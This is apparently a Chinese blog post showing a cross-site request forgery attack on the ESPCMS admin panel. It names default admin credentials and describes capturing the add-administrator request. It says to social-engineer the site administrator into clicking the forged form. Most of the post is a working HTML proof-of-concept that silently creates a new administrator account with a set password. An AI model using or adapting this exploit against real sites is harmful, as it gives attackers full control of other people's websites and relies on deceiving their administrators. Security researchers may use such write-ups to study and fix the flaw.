zoukankan      html  css  js  c++  java
  • ESPCMS的CSRF添加管理员账号

    ESPCMS的CSRF添加管理员账号

    前言

    这里开始的思路是先注入进去 然后getshell 但是不关CSRF什么事

    换思路 看了一下群消息  大哥发了一个视频  后台名称admin  admin123

    0X01 CSRF攻击之旅

    进后台添加管理   这里 为了试验环境 需要把你加的管理先删除了

     

    然后POST抓包 添加用户的这里构造CSRF

     

    然后社工管理员

    管理点击后

     

    成功

     exp

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <form action="http://www.espcms.com/adminsoft/index.php?archive=management&action=managesava" method="POST">
          <input type="hidden" name="inputclass" value="add" />
          <input type="hidden" name="tab" value="true" />
          <input type="hidden" name="username" value="zhong" />
          <input type="hidden" name="password" value="zhongzhong" />
          <input type="hidden" name="password2" value="zhongzhong" />
          <input type="hidden" name="name" value="zhong" />
          <input type="hidden" name="sex" value="1" />
          <input type="hidden" name="powergroup" value="1" />
          <input type="hidden" name="inputclassid" value="1" />
          <input type="hidden" name="isremote" value="1" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
  • 相关阅读:
    Excel VB Script
    Excel Text Converter as C# Format
    快捷键
    如何使用 MasterPage
    Excel 오른쪽버튼 윗주
    Oracle Hints
    ASP.NET 弹出窗口
    Log4Net
    word 修改 表宽度
    While 나가는 법
  • 原文地址:https://www.cnblogs.com/-zhong/p/11061884.html
Copyright © 2011-2022 走看看